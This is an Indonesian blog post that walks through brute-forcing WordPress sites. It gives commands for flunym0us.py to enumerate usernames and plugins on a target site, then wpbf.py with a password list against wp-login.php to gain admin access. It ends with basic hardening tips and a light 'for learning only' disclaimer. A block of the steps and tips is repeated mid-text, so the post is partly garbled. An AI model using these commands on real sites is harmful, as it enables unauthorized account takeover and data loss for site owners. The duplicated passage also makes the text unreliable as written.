Maraknya
hacking yang terjadi saat ini terutama pada cms wordpress membuat pengguna yang
menggunakan cms ini merasa khawatir akan keamanan data web. Meskipun dari sisi
server sudah dilakukan proteksi dengan adanya firewall, namun pada sisi web
juga mutlak harus dilakukan proteksi lebih lanjut. Hal ini dikarenakan biasanya
para cracker masuk melalui bugs yang ada pada script web tersebut. Namun, yang
paling penting adalah bagaimana di era teknologi informasi yang semakin pesat
ini dapat memanfaatkannya secara cerdas dan beretika.
Banyak serangan global yang terjadi pada website cms berbasis wordpress, serangan dengan menggunakan metode brute force login ini ditujukan untuk masuk ke akun admin dan database sehingga peretas dapat menembus system keamanan. Maka dari itu agar tidak terjadi hal yang tidak diinginkan seperti kehilangan data, maupun rusaknya isi dari website berbasiskan wordpress yang digunakan, bagi pemilik website harus melakukan pengamanan.
Namun, kita tidak boleh juga secara sembarangan ngehack akun orang, kalo yang di hack ga berkenan bisa dosa lho, kita share buat belajar aja ya guys :D
Hal-hal yang diuji :
1. Scanning username dan password sehingga dapat hak
akses pada website target
Proses pengerjaan :
1. Buka alamat website target
2. Buka dir cmd pada phyton
3. Ketikkan flunym0us.py pada dir cmd
4. lalu ketikan: flunym0us.py -H (nama web target) -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2 untuk mendapatkan akses masuk username kita.
5. Setelah kita mendapatkan username tutup cmd. Mengulangi langkah nomor 2 dan memulai scanning password dengan mengetikkan : wpbf.py
6. Dilanjutkan mengetikkan : wpbf.py -h http://"target"/wp-login.php -u "username" -P passlist.txt
Beberapa tips berikut dapat meminimalisir serangan attacker yang tidak bertanggungjawab (cracker) dan membantu memproteksi web wordpress :
1. Gunakan Password yang kuat dan ganti secara berkala.
2. Proteksi Direktori ‘wp-admin’.
3. Ubah Url wp-admin.
4. Tolak akses ke Plugin dan direktori lain.
5. Daily Backup
3. Ketikkan flunym0us.py pada dir cmd
4. lalu ketikan: flunym0us.py -H (nama web target) -wp -w wp-plugins.lst -t 60 -r 1 -p 2 -T 2 untuk mendapatkan akses masuk username kita.
5. Setelah kita mendapatkan username tutup cmd. Mengulangi langkah nomor 2 dan memulai scanning password dengan mengetikkan : wpbf.py
6. Dilanjutkan mengetikkan : wpbf.py -h http://"target"/wp-login.php -u "username" -P passlist.txt
Beberapa tips berikut dapat meminimalisir serangan attacker yang tidak bertanggungjawab (cracker) dan membantu memproteksi web wordpress :
1. Gunakan Password yang kuat dan ganti secara berkala.
2. Proteksi Direktori ‘wp-admin’.
3. Ubah Url wp-admin.
4. Tolak akses ke Plugin dan direktori lain.
5. Daily Backup
Menjadwalkan sendiri backup untuk akun anda, fitur
backup yang tersedia di cpanel akan cukup membantu anda dalam backup seluruh
file dan database.
6.
Update informasi bugs terbaru.
7.
Hati-hati ketika upload sesuatu untuk situs
ABOUT THE AUTHOR
Sekecil apapun ilmu yang kita punya alangkah indahnya bila bermanfaat bagi sesama :)
0 komentar:
Posting Komentar